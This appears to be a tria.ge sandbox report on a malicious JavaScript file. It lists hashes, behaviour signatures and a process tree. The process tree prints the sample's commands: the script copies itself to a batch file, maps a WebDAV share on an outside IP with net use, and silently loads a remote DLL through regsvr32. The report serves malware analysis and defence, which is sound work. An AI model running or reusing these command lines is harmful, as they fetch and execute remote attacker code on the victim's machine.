Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
10/07/2024, 01:02
Static task
static1
Behavioral task
behavioral1
Sample
04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d.js
Resource
win10v2004-20240709-en
General
-
Target
04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d.js
-
Size
5KB
-
MD5
81ff023b48275d5a6b535a2370fce4a3
-
SHA1
9de4cdf4c8e6598f2aeb2529b2e2036ed5eedd7f
-
SHA256
04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d
-
SHA512
47f381a7ba1c3952320761dcc01b87094e576ecb7cefb306d6aaddf925a7e1174a0824766e81a166641cbb2e2723506c451c3d4d05f8d8e26c2be93d33f73849
-
SSDEEP
96:1cmrqBIO0hGCoFWU6660aBFWU6660WowHZJAcn2PqjVRQ6iVpPkY:1vqaUCoFWU6665BFWU666PMS2PqjVRgF
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2812 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 1712 wrote to memory of 3052 1712 wscript.exe 31 PID 1712 wrote to memory of 3052 1712 wscript.exe 31 PID 1712 wrote to memory of 3052 1712 wscript.exe 31 PID 3052 wrote to memory of 2584 3052 cmd.exe 33 PID 3052 wrote to memory of 2584 3052 cmd.exe 33 PID 3052 wrote to memory of 2584 3052 cmd.exe 33 PID 3052 wrote to memory of 2812 3052 cmd.exe 34 PID 3052 wrote to memory of 2812 3052 cmd.exe 34 PID 3052 wrote to memory of 2812 3052 cmd.exe 34 PID 3052 wrote to memory of 2812 3052 cmd.exe 34 PID 3052 wrote to memory of 2812 3052 cmd.exe 34
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d.js1⤵
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d.js" "C:\Users\Admin\\afzwlo.bat" && "C:\Users\Admin\\afzwlo.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2584
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\220.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2812
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD581ff023b48275d5a6b535a2370fce4a3
SHA19de4cdf4c8e6598f2aeb2529b2e2036ed5eedd7f
SHA25604c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d
SHA51247f381a7ba1c3952320761dcc01b87094e576ecb7cefb306d6aaddf925a7e1174a0824766e81a166641cbb2e2723506c451c3d4d05f8d8e26c2be93d33f73849